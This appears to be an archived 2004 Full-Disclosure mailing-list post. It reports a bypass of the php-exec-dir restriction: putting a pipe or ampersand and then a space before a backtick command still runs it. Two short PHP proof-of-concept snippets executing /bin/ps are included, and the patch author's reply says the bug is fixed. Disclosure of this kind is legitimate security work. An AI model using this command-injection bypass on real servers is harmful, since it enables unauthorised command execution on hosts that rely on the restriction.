[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] RE: php-exec-dir vulnerable after latest upgrade

To: <full-disclosure@xxxxxxxxxxxxxxxx>, "C. McCohy" <mccohy@xxxxxxxxxxxx>
Subject: [Full-Disclosure] RE: php-exec-dir vulnerable after latest upgrade
From: "VeNoMouS" <venom@xxxxxxxxxxx>
Date: Thu, 8 Jul 2004 17:08:57 +1200

Another way to do this is to replace | with "&" still need space after wards

example:

<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>

----- Original Message ----- From: "VeNoMouS" <venom@xxxxxxxxxxx> To: "C. McCohy" <mccohy@xxxxxxxxxxxx>; <full-disclosure@xxxxxxxxxxxxxxxx> Sent: Thursday, July 08, 2004 1:05 PM Subject: php-exec-dir vulnerable after latest upgrade

<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
^^ do a |<space>ps exploits it again

i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside it and i was still able to execute it, you HAVE to do the space after the pipe '|'.

----- Original Message ----- From: "C. McCohy" <mccohy@xxxxxxxxxxxx> To: "VeNoMouS" <venom@xxxxxxxxxxx> Sent: Wednesday, July 07, 2004 9:43 PM Subject: Re: php-exec-dir vulnerable?
Ok I fixed all patches to all previous and current versions of the patch,
description can be found on the project homepage
http://kyberdigi.cz/projects/execdir/
Please inform all internet groups you have informed about the bug before.
--
Baj ... C. McCohy
While you are reading this text, an essential hacking tool
is being silently installed on your computer.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug
Next by Date: RE: [Full-Disclosure] Nokia 3560 Remote DOS
Previous by thread: Re: [security] RE: [Full-Disclosure] Nokia 3560 Remote DOS
Next by thread: [Full-Disclosure] denial of service on ISN list
Index(es):
- Date
- Thread